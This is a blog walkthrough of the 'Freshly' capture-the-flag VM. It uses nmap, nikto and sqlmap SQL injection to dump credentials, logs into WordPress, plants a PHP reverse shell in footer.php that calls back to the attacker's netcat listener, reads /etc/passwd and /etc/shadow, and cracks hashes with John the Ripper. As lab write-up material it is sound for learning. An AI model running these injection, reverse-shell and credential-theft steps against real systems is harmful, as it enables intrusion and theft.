piyr9 bio photo

piyr9

A Curious Mind with a Craving for Information to Life's many Problems.

Overview

Getting started to CTF on Freshly, Scanning the Perimeter

Scanning looking Freshly VM with nmap was quick and painless

	root@fox-kali:~# nmap -sV -P0 -n -A 192.168.76.0/24
	Nmap scan report for 192.168.76.101
	Host is up (0.00037s latency).
	Not shown: 997 closed ports
	PORT     STATE SERVICE  VERSION
	80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
	|_http-title: Site doesn't have a title (text/html).
	443/tcp  open  ssl/http Apache httpd
	|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
	|_http-title: Site doesn't have a title (text/html).
	| ssl-cert: Subject: commonName=www.example.com
	| Not valid before: 2015-02-17T03:30:05+00:00
	|_Not valid after:  2025-02-14T03:30:05+00:00
	|_ssl-date: 1978-01-27T11:57:48+00:00; -37y79d8h25m34s from local time.
	8080/tcp open  http     Apache httpd
	|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
	|_http-title: Site doesn't have a title (text/html).
	MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)
	Device type: general purpose
	Running: Linux 3.X
	OS CPE: cpe:/o:linux:linux_kernel:3
	OS details: Linux 3.11 - 3.14
	Network Distance: 1 hop

	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.37 ms 192.168.76.101

Recon Phase

We load up our browser to the Apache webserver at 192.168.76.101:80 and we are shown this image. After a nice chuckle, we continue exploring as there is nothing here worth mentioning after looking at the page source.

Alt text

Ok, next lets go to https://192.168.76.101:443 and accept the invalid site certificate. hmm okay, seems its just a simple redirection to 192.168.76.101:8080 to the page on port 8080.

Alt text

Clicking on the link seems to give us this wordpress site, okay there are some exploits in wordpress we can use, but lets explore the rest of the machine first.

Alt text

Check for Vulnerablities

Next I launched Nikto and OWASP-ZAP on port 80 to see if there is something obvious we can exploit. OWASP-ZAP didn’t show anything interesting worth mentioning but Nikto had some interesting output:

	root@fox-kali:~# nikto -h 192.168.76.101
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP:          192.168.76.101
	+ Target Hostname:    192.168.76.101
	+ Target Port:        80
	+ Start Time:         2015-04-16 16:33:26 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Apache/2.4.7 (Ubuntu)
	+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c 
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
	+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
	+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self'  'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data:  *.tile.openstreetmap.org *.tile.opencyclemap.org;
	+ Uncommon header 'x-ob_mode' found, with contents: 0
	+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data:  *.tile.openstreetmap.org *.tile.opencyclemap.org;
	+ OSVDB-3233: /icons/README: Apache default file found.
	+ /login.php: Admin login page/section found.
	+ /phpmyadmin/: phpMyAdmin directory found
	+ 6744 requests: 0 error(s) and 10 item(s) reported on remote host
	+ End Time:           2015-04-16 16:33:43 (GMT-4) (17 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

Here we can see there seems to be a login.php as well as a phpmyadmin here. Lets check out http://192.168.76.101/login.php

Alt text

This screams SQLi to me, not much luck doing manual SQL injections so an injection like ‘ or ‘1’ = ‘1’ #

Out comes sqlmap

SQL Injection via sqlmap

	root@fox-kali:~# sqlmap -u "http://192.168.76.101/login.php" --dbms=MySQL --dump --data "username=admin&password=pass&s=Submit" --level=9 --risk=9
	POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
	sqlmap identified the following injection points with a total of 11916 HTTP(s) requests:
	---
	Place: POST
	Parameter: password
	    Type: AND/OR time-based blind
	    Title: MySQL > 5.0.11 AND time-based blind
	    Payload: username=admin&password=pass'||(SELECT 'PJDY' FROM DUAL WHERE 5537=5537 AND SLEEP(5) )||'&s=Submit
	---
	[17:05:30] [INFO] the back-end DBMS is MySQL
	web server operating system: Linux Ubuntu
	web application technology: Apache 2.4.7, PHP 5.5.9
	back-end DBMS: MySQL 5.0.11
	[17:05:30] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
	[17:05:30] [INFO] fetching current database
	[17:05:30] [INFO] retrieved: 
	[17:05:30] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
	do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
	[17:06:05] [INFO] adjusting time delay to 1 second due to good response times
	login
	[17:06:44] [INFO] fetching tables for database: 'login'
	[17:06:44] [INFO] fetching number of tables for database 'login'
	[17:06:44] [INFO] retrieved: 2
	[17:06:48] [INFO] retrieved: user_name
	[17:07:57] [INFO] retrieved: users
	[17:08:13] [INFO] fetching columns for table 'user_name' in database 'login'
	[17:08:13] [INFO] retrieved: 1
	[17:08:15] [INFO] retrieved: user_name
	[17:09:24] [INFO] fetching entries for table 'user_name' in database 'login'
	[17:09:24] [INFO] fetching number of entries for table 'user_name' in database 'login'
	[17:09:24] [INFO] retrieved: 1
	[17:09:26] [INFO] retrieved: candyshop
	[17:10:43] [INFO] analyzing table dump for possible password hashes
	Database: login
	Table: user_name
	[1 entry]
	+-----------+
	| user_name |
	+-----------+
	| candyshop |
	+-----------+

	[17:10:43] [INFO] table 'login.user_name' dumped to CSV file '/usr/share/sqlmap/output/192.168.76.101/dump/login/user_name.csv'
	[17:10:43] [INFO] fetching columns for table 'users' in database 'login'
	[17:10:43] [INFO] retrieved: 2
	[17:10:47] [INFO] retrieved: user_name
	[17:11:56] [INFO] retrieved: password
	[17:13:05] [INFO] fetching entries for table 'users' in database 'login'
	[17:13:05] [INFO] fetching number of entries for table 'users' in database 'login'
	[17:13:05] [INFO] retrieved: 2
	[17:13:09] [INFO] retrieved: password
	[17:14:18] [INFO] retrieved: candyshop
	[17:15:35] [INFO] retrieved: PopRocks
	[17:16:45] [INFO] retrieved: Sir
	[17:17:06] [INFO] analyzing table dump for possible password hashes
	Database: login
	Table: users
	[2 entries]
	+----------+-----------+
	| password | user_name |
	+----------+-----------+
	| password | candyshop |
	| PopRocks | Sir       |
	+----------+-----------+

	[17:17:06] [INFO] table 'login.users' dumped to CSV file '/usr/share/sqlmap/output/192.168.76.101/dump/login/users.csv'
	[17:17:06] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.76.101'

	[*] shutting down at 17:17:06

Okay, some user passwords, might help but lets keep going and see if there is more databases to explore.

	root@fox-kali:~# sqlmap -u "http://192.168.76.101/login.php" --dbms=MySQL --dump --data "user=1&password=1&s=Submit" --dbs
	
	available databases [7]:
	[*] information_schema
	[*] login
	[*] mysql
	[*] performance_schema
	[*] phpmyadmin
	[*] users
	[*] wordpress8080

Seems there are 7 other databases on the server, and two of them standout to me. phpmyadmin and wordpress8080 Lets check out the phpmyadmin database:

	Database: phpmyadmin
	Table: pma_column_info
	[5 entries]
	+----+---------+---------------+----------+------------+-------------+----------------+------------------------+
	| id | comment | db_name       | mimetype | table_name | column_name | transformation | transformation_options |
	+----+---------+---------------+----------+------------+-------------+----------------+------------------------+
	| 1  | <blank> | login         | <blank>  | user_name  | user_name   | _              | <blank>                |
	| 2  | <blank> | login         | <blank>  | users      | user_name   | _              | <blank>                |
	| 3  | <blank> | login         | <blank>  | users      | password    | _              | <blank>                |
	| 4  | <blank> | wordpress8080 | <blank>  | users      | username    | _              | <blank>                |
	| 5  | <blank> | wordpress8080 | <blank>  | users      | password    | _              | <blank>                |
	+----+---------+---------------+----------+------------+-------------+----------------+------------------------+

Okay, some data but not particularly useful, lets try the wordpress8080 database

	root@fox-kali:~# sqlmap -u "http://192.168.76.101/login.php" --dbms=MySQL --dump --data "user=1&password=1&s=Submit" -D wordpress8080

	Database: wordpress8080
	Table: users
	[1 entry]
	+----------+---------------------+
	| username | password            |
	+----------+---------------------+
	| admin    | SuperSecretPassword |
	+----------+---------------------+

Bingo!, the username and password for wordpress is shown. Lets go login, by default the wordpress admin page should be wp-login.php. Loading the browser to http://192.168.76.101:8080/wordpress/wp-login.php

Alt text

And….We are in, well what do we have here is the wordpress admin interface and getting in, is a snap We go into Appearance -> Editor and we see all the templates on the right hand side

Alt text

I know that the footer.php is run everytime any page loads on the wordpress site, so lets use this to inject our code

On Kali linux lets look for a php reverse shell that would work for us:

	root@fox-kali:~# locate php|grep reverse
	/usr/share/beef-xss/modules/exploits/m0n0wall/php-reverse-shell.php
	/usr/share/laudanum/php/php-reverse-shell.php
	/usr/share/metasploit-framework/data/php/reverse_tcp.php
	/usr/share/metasploit-framework/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
	/usr/share/metasploit-framework/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
	/usr/share/metasploit-framework/modules/payloads/singles/php/reverse_perl.rb
	/usr/share/metasploit-framework/modules/payloads/singles/php/reverse_php.rb
	/usr/share/metasploit-framework/modules/payloads/stagers/php/reverse_tcp.rb
	/usr/share/webshells/php/php-reverse-shell.php

Next copy the contents of /usr/share/webshells/php/php-reverse-shell.php and place them into the footer code, making sure to modify the IP address and port of the exploit to point to our Kali machine

	$ip = '192.168.76.102';  // CHANGE THIS
	$port = 591;       // CHANGE THIS

Alt text

Reverse Shell

Click on update and on our Kali machine lets load up a netcat listener then proceed to refresh the wordpress site

	root@fox-kali:~# nc -lvp 591
	listening on [any] 591 ...
	192.168.76.101: inverse host lookup failed: Unknown server error : Connection timed out
	connect to [192.168.76.102] from (UNKNOWN) [192.168.76.101] 44319
	Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
	 14:34:28 up 22:22,  0 users,  load average: 0.08, 0.23, 0.24
	USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
	uid=1(daemon) gid=1(daemon) groups=1(daemon)
	/bin/sh: 0: can't access tty; job control turned off
	$ whoami
	daemon

Okay that was straight forward, now we are in, lets explore

	$ cat /etc/passwd
	root:x:0:0:root:/root:/bin/bash
	daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
	bin:x:2:2:bin:/bin:/usr/sbin/nologin
	sys:x:3:3:sys:/dev:/usr/sbin/nologin
	sync:x:4:65534:sync:/bin:/bin/sync
	games:x:5:60:games:/usr/games:/usr/sbin/nologin
	man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
	lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
	mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
	news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
	uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
	proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
	www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
	backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
	list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
	irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
	gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
	nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
	libuuid:x:100:101::/var/lib/libuuid:
	syslog:x:101:104::/home/syslog:/bin/false
	messagebus:x:102:105::/var/run/dbus:/bin/false
	user:x:1000:1000:user,,,:/home/user:/bin/bash
	mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
	candycane:x:1001:1001::/home/candycane:
	# YOU STOLE MY SECRET FILE!
	# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

	$ cat /etc/shadow
	root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
	daemon:*:16483:0:99999:7:::
	bin:*:16483:0:99999:7:::
	sys:*:16483:0:99999:7:::
	sync:*:16483:0:99999:7:::
	games:*:16483:0:99999:7:::
	man:*:16483:0:99999:7:::
	lp:*:16483:0:99999:7:::
	mail:*:16483:0:99999:7:::
	news:*:16483:0:99999:7:::
	uucp:*:16483:0:99999:7:::
	proxy:*:16483:0:99999:7:::
	www-data:*:16483:0:99999:7:::
	backup:*:16483:0:99999:7:::
	list:*:16483:0:99999:7:::
	irc:*:16483:0:99999:7:::
	gnats:*:16483:0:99999:7:::
	nobody:*:16483:0:99999:7:::
	libuuid:!:16483:0:99999:7:::
	syslog:*:16483:0:99999:7:::
	messagebus:*:16483:0:99999:7:::
	user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
	mysql:!:16483:0:99999:7:::
	candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
	# YOU STOLE MY PASSWORD FILE!
	# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

Ok, seems I caught the flag, but I’m still not satisfied until I get root, lets launch john the ripper

	root@fox-kali:~# john --wordlist=/root/rockyou.txt /tmp/fresh 
	Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
	Use the "--format=crypt" option to force loading these as that type instead
	Loaded 3 password hashes with 3 different salts (sha512crypt [64/64])
	password         (candycane)

This is still running in the background but as this is running lets look for a different attack vector to escalate our privileges Stay Tuned, john the ripper is still running…

Update: I have been told that this VM was not designed to be rootable, so the walkthrough stops here.

Other thoughts: It might have been rootable if gcc compiler was installed on this Ubuntu machine, on that note piyr9 signing off until next VM.